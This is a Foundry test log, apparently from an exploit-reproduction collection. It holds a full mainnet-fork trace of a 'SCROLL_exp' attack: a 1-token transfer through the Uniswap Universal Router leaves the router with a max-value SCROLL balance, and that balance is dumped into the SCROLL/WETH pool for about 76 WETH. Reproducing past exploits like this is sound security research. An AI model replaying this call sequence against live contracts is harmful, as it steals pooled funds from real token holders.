Compiling 23 files with Solc 0.8.28
Solc 0.8.28 finished in 1.19s
Compiler run successful with warnings:
Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1084:5:
     |
1084 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1896:5:
     |
1896 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2198:5:
     |
2198 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2967:5:
     |
2967 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:4424:5:
     |
4424 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
  --> src/test/2024-05/SCROLL_exp.sol:31:5:
   |
31 |     WETH9 constant WETH = WETH9(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2);
   |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (3628): This contract has a payable fallback function, but no receive ether function. Consider adding a receive ether function.
  --> src/test/2024-05/SCROLL_exp.sol:22:1:
   |
22 | contract ContractTest is Test {
   | ^ (Relevant source part starts here and spans across multiple lines).
Note: The payable fallback function is defined here.
  --> src/test/2024-05/SCROLL_exp.sol:66:5:
   |
66 |     fallback() external payable {}
   |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^


Ran 1 test for script/Exploit-template_new.sol:ExploitScript
[PASS] testExploit() (gas: 23756)
Logs:
  Attacker ETH Balance Before exploit: 0.000000000000000000
  Attacker ETH Balance After exploit: 0.000000000000000000

Traces:
  [7939] ExploitScript::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 1234567 [1.234e6])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [23756] ExploitScript::testExploit()
    ├─ [0] VM::deal(ExploitScript: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance Before exploit", val: 0, decimals: 18)
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance After exploit", val: 0, decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 828.10ms (33.54ms CPU time)

Ran 1 test for src/test/2024-05/SCROLL_exp.sol:ContractTest
[PASS] testExploit() (gas: 444539)
Traces:
  [13672] ContractTest::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 19971610 [1.997e7])
    │   └─ ← [Return] 0
    ├─ [0] VM::label(SCROLL: [0xe51D3dE9b81916D383eF97855C271250852eC7B7], "SCROLL")
    │   └─ ← [Return]
    ├─ [0] VM::label(WETH: [0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2], "WETH")
    │   └─ ← [Return]
    ├─ [0] VM::label(Universal Router: [0x3fC91A3afd70395Cd496C647d5a6CC9D4B2b7FAD], "Universal Router")
    │   └─ ← [Return]
    ├─ [0] VM::label(Uniswap V2 pair SCROLL WETH: [0xa718aa1b3f61C2b90A01aB244597816a7eE69fD2], "Uniswap V2 pair SCROLL WETH")
    │   └─ ← [Return]
    ├─ [0] VM::label(Uniswap V2 Router: [0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D], "Uniswap V2 Router")
    │   └─ ← [Return]
    └─ ← [Stop]

  [495539] ContractTest::testExploit()
    ├─ [2908] SCROLL::balanceOf(Universal Router: [0x3fC91A3afd70395Cd496C647d5a6CC9D4B2b7FAD]) [staticcall]
    │   └─ ← [Return] 0
    ├─ [132204] Universal Router::execute(0x05, [0x000000000000000000000000e51d3de9b81916d383ef97855c271250852ec7b700000000000000000000000072c509b05a44c4bb53373efc2e76fb75fa8108a60000000000000000000000000000000000000000000000000000000000000001])
    │   ├─ [125108] SCROLL::transfer(0x72C509B05A44c4Bb53373Efc2E76fB75FA8108a6, 1)
    │   │   ├─ emit Transfer(from: Universal Router: [0x3fC91A3afd70395Cd496C647d5a6CC9D4B2b7FAD], to: 0x72C509B05A44c4Bb53373Efc2E76fB75FA8108a6, value: 1)
    │   │   ├─  storage changes:
    │   │   │   @ 5: 488 → 489
    │   │   │   @ 0x1510d9214f227226d818ad648be7a2e0634db540481736675ac047ca90fe1cd7: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   │   │   @ 0xb925ebef33dd2573e97639baf14970e59224d17e92376315941135672e0441b0: 0x0000000000000000000000000000000000000000033a02786d6926bcabd5ef51 → 0x0000000000000000000000000000000000000000033a02786d6926bcabd5ef52
    │   │   │   @ 0x69b83a3f9dc3eeedf5bc5044902bc04501cf6023d42933aa950fa1f6241895d5: 0 → 0x0000000000000000000000003fc91a3afd70395cd496c647d5a6cc9d4b2b7fad
    │   │   │   @ 0x69b83a3f9dc3eeedf5bc5044902bc04501cf6023d42933aa950fa1f6241895d4: 0 → 0x00000000000000000000000000000000000000000000000000000000665666f3
    │   │   │   @ 0x69b83a3f9dc3eeedf5bc5044902bc04501cf6023d42933aa950fa1f6241895d6: 0 → 0x00000000000000000000000072c509b05a44c4bb53373efc2e76fb75fa8108a6
    │   │   │   @ 0x69b83a3f9dc3eeedf5bc5044902bc04501cf6023d42933aa950fa1f6241895d3: 0 → 1
    │   │   └─ ← [Return] true
    │   ├─  storage changes:
    │   │   @ 0xb925ebef33dd2573e97639baf14970e59224d17e92376315941135672e0441b0: 0x0000000000000000000000000000000000000000033a02786d6926bcabd5ef51 → 0x0000000000000000000000000000000000000000033a02786d6926bcabd5ef52
    │   └─ ← [Return]
    ├─ [908] SCROLL::balanceOf(Universal Router: [0x3fC91A3afd70395Cd496C647d5a6CC9D4B2b7FAD]) [staticcall]
    │   └─ ← [Return] 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77]
    ├─ [2908] SCROLL::balanceOf(Uniswap V2 pair SCROLL WETH: [0xa718aa1b3f61C2b90A01aB244597816a7eE69fD2]) [staticcall]
    │   └─ ← [Return] 136275915391323680414683 [1.362e23]
    ├─ [8612] Uniswap V2 Router::getAmountsOut(136275915391323680414683000 [1.362e26], [0xe51D3dE9b81916D383eF97855C271250852eC7B7, 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2]) [staticcall]
    │   ├─ [2504] Uniswap V2 pair SCROLL WETH::getReserves() [staticcall]
    │   │   └─ ← [Return] 76436699224492990081 [7.643e19], 136275915391323680414683 [1.362e23], 1716938231 [1.716e9]
    │   └─ ← [Return] [136275915391323680414683000 [1.362e26], 76360109345510532175 [7.636e19]]
    ├─ [111683] Universal Router::execute(0x05, [0x000000000000000000000000e51d3de9b81916d383ef97855c271250852ec7b7000000000000000000000000a718aa1b3f61c2b90a01ab244597816a7ee69fd200000000000000000000000000000000000000000070b98c2d1dd0bb5b9ccf78])
    │   ├─ [106587] SCROLL::transfer(Uniswap V2 pair SCROLL WETH: [0xa718aa1b3f61C2b90A01aB244597816a7eE69fD2], 136275915391323680414683000 [1.362e26])
    │   │   ├─ emit Transfer(from: Universal Router: [0x3fC91A3afd70395Cd496C647d5a6CC9D4B2b7FAD], to: Uniswap V2 pair SCROLL WETH: [0xa718aa1b3f61C2b90A01aB244597816a7eE69fD2], value: 136275915391323680414683000 [1.362e26])
    │   │   ├─  storage changes:
    │   │   │   @ 0x91ab5b5a33ef1ca980ec4f55ecdaa9512713e71979e0a5138c770e9cc6534780: 0 → 0x00000000000000000000000000000000000000000070b98c2d1dd0bb5b9ccf78
    │   │   │   @ 5: 489 → 490
    │   │   │   @ 0x91ab5b5a33ef1ca980ec4f55ecdaa9512713e71979e0a5138c770e9cc6534783: 0 → 0x000000000000000000000000a718aa1b3f61c2b90a01ab244597816a7ee69fd2
    │   │   │   @ 0x1510d9214f227226d818ad648be7a2e0634db540481736675ac047ca90fe1cd7: 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff → 0xffffffffffffffffffffffffffffffffffffffffff8f4673d2e22f44a4633087
    │   │   │   @ 0xbd5997615074d069e029f859dce35f56858f6b5a889b22f3bed4471026a7c7ea: 0x000000000000000000000000000000000000000000001cdb883cb3aa2bde1bdb → 0x00000000000000000000000000000000000000000070d667b55a8465877aeb53
    │   │   │   @ 0x91ab5b5a33ef1ca980ec4f55ecdaa9512713e71979e0a5138c770e9cc6534782: 0 → 0x0000000000000000000000003fc91a3afd70395cd496c647d5a6cc9d4b2b7fad
    │   │   │   @ 0x91ab5b5a33ef1ca980ec4f55ecdaa9512713e71979e0a5138c770e9cc6534781: 0 → 0x00000000000000000000000000000000000000000000000000000000665666f3
    │   │   └─ ← [Return] true
    │   ├─  storage changes:
    │   │   @ 0xbd5997615074d069e029f859dce35f56858f6b5a889b22f3bed4471026a7c7ea: 0x000000000000000000000000000000000000000000001cdb883cb3aa2bde1bdb → 0x00000000000000000000000000000000000000000070d667b55a8465877aeb53
    │   └─ ← [Return]
    ├─ [65227] Uniswap V2 pair SCROLL WETH::swap(76360109345510532175 [7.636e19], 0, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x)
    │   ├─ [29962] WETH::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 76360109345510532175 [7.636e19])
    │   │   ├─ emit Transfer(from: Uniswap V2 pair SCROLL WETH: [0xa718aa1b3f61C2b90A01aB244597816a7eE69fD2], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 76360109345510532175 [7.636e19])
    │   │   ├─  storage changes:
    │   │   │   @ 0x8da361a6973aa8eacf52bc8207ba8ebd93ba85f6c76a116d4bbfc848e4200ecf: 0x00000000000000000000000000000000000000000000000424c5b4f73747de81 → 0x00000000000000000000000000000000000000000000000001101a16d223ba32
    │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0 → 0x00000000000000000000000000000000000000000000000423b59ae06524244f
    │   │   └─ ← [Return] true
    │   ├─ [534] WETH::balanceOf(Uniswap V2 pair SCROLL WETH: [0xa718aa1b3f61C2b90A01aB244597816a7eE69fD2]) [staticcall]
    │   │   └─ ← [Return] 76589878982457906 [7.658e16]
    │   ├─ [908] SCROLL::balanceOf(Uniswap V2 pair SCROLL WETH: [0xa718aa1b3f61C2b90A01aB244597816a7eE69fD2]) [staticcall]
    │   │   └─ ← [Return] 136412191306715004095097683 [1.364e26]
    │   ├─ emit Sync(reserve0: 76589878982457906 [7.658e16], reserve1: 136412191306715004095097683 [1.364e26])
    │   ├─ emit Swap(sender: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], amount0In: 0, amount1In: 136275915391323680414683000 [1.362e26], amount0Out: 76360109345510532175 [7.636e19], amount1Out: 0, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   ├─  storage changes:
    │   │   @ 10: 0x00000000000000000000000000000000000522d21407886d1501809aef7a3c50 → 0x0000000000000000000000000000000000054701537fdccbb7d471c93d25c610
    │   │   @ 9: 0x0000000000000000000000000004257688dbca1ea5a902ec330301e2bc0b842c → 0x0000000000000000000000000004257d63dc7316d166e0427c7f215e9fe49340
    │   │   @ 8: 0x665665f7000000001cdb883cb3aa2bde1bdb00000000000424c5b4f73747de81 → 0x665666f300000070d667b55a8465877aeb5300000000000001101a16d223ba32
    │   └─ ← [Stop]
    ├─ [534] WETH::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 76360109345510532175 [7.636e19]
    ├─ [9181] WETH::withdraw(76360109345510532175 [7.636e19])
    │   ├─ [41] ContractTest::fallback{value: 76360109345510532175}()
    │   │   └─ ← [Stop]
    │   ├─ emit Withdrawal(src: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], wad: 76360109345510532175 [7.636e19])
    │   ├─  storage changes:
    │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0x00000000000000000000000000000000000000000000000423b59ae06524244f → 0
    │   └─ ← [Stop]
    ├─ [908] SCROLL::balanceOf(Universal Router: [0x3fC91A3afd70395Cd496C647d5a6CC9D4B2b7FAD]) [staticcall]
    │   └─ ← [Return] 115792089237316195423570985008687907853269984665640427763542192684232714956935 [1.157e77]
    ├─ [124783] Universal Router::execute(0x05, [0x000000000000000000000000e51d3de9b81916d383ef97855c271250852ec7b70000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496ffffffffffffffffffffffffffffffffffffffffff8f4673d2e22f44a4633087])
    │   ├─ [119687] SCROLL::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 115792089237316195423570985008687907853269984665640427763542192684232714956935 [1.157e77])
    │   │   ├─ emit Transfer(from: Universal Router: [0x3fC91A3afd70395Cd496C647d5a6CC9D4B2b7FAD], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 115792089237316195423570985008687907853269984665640427763542192684232714956935 [1.157e77])
    │   │   ├─  storage changes:
    │   │   │   @ 0xed85464681cf13f1b75d78e7f27dcf6f81bcb07a6f89e5530327fe310424559f: 0 → 0x00000000000000000000000000000000000000000000000000000000665666f3
    │   │   │   @ 0xed85464681cf13f1b75d78e7f27dcf6f81bcb07a6f89e5530327fe31042455a1: 0 → 0x0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496
    │   │   │   @ 0xed85464681cf13f1b75d78e7f27dcf6f81bcb07a6f89e5530327fe31042455a0: 0 → 0x0000000000000000000000003fc91a3afd70395cd496c647d5a6cc9d4b2b7fad
    │   │   │   @ 0xed85464681cf13f1b75d78e7f27dcf6f81bcb07a6f89e5530327fe310424559e: 0 → 0xffffffffffffffffffffffffffffffffffffffffff8f4673d2e22f44a4633087
    │   │   │   @ 0x1510d9214f227226d818ad648be7a2e0634db540481736675ac047ca90fe1cd7: 0xffffffffffffffffffffffffffffffffffffffffff8f4673d2e22f44a4633087 → 0
    │   │   │   @ 5: 490 → 491
    │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0 → 0xffffffffffffffffffffffffffffffffffffffffff8f4673d2e22f44a4633087
    │   │   └─ ← [Return] true
    │   ├─  storage changes:
    │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0 → 0xffffffffffffffffffffffffffffffffffffffffff8f4673d2e22f44a4633087
    │   └─ ← [Return]
    ├─  storage changes:
    │   @ 12: 0 → 1
    │   @ 1: 0x0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496 → 1
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 9.82s (8.34s CPU time)

Ran 2 test suites in 9.92s (10.65s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
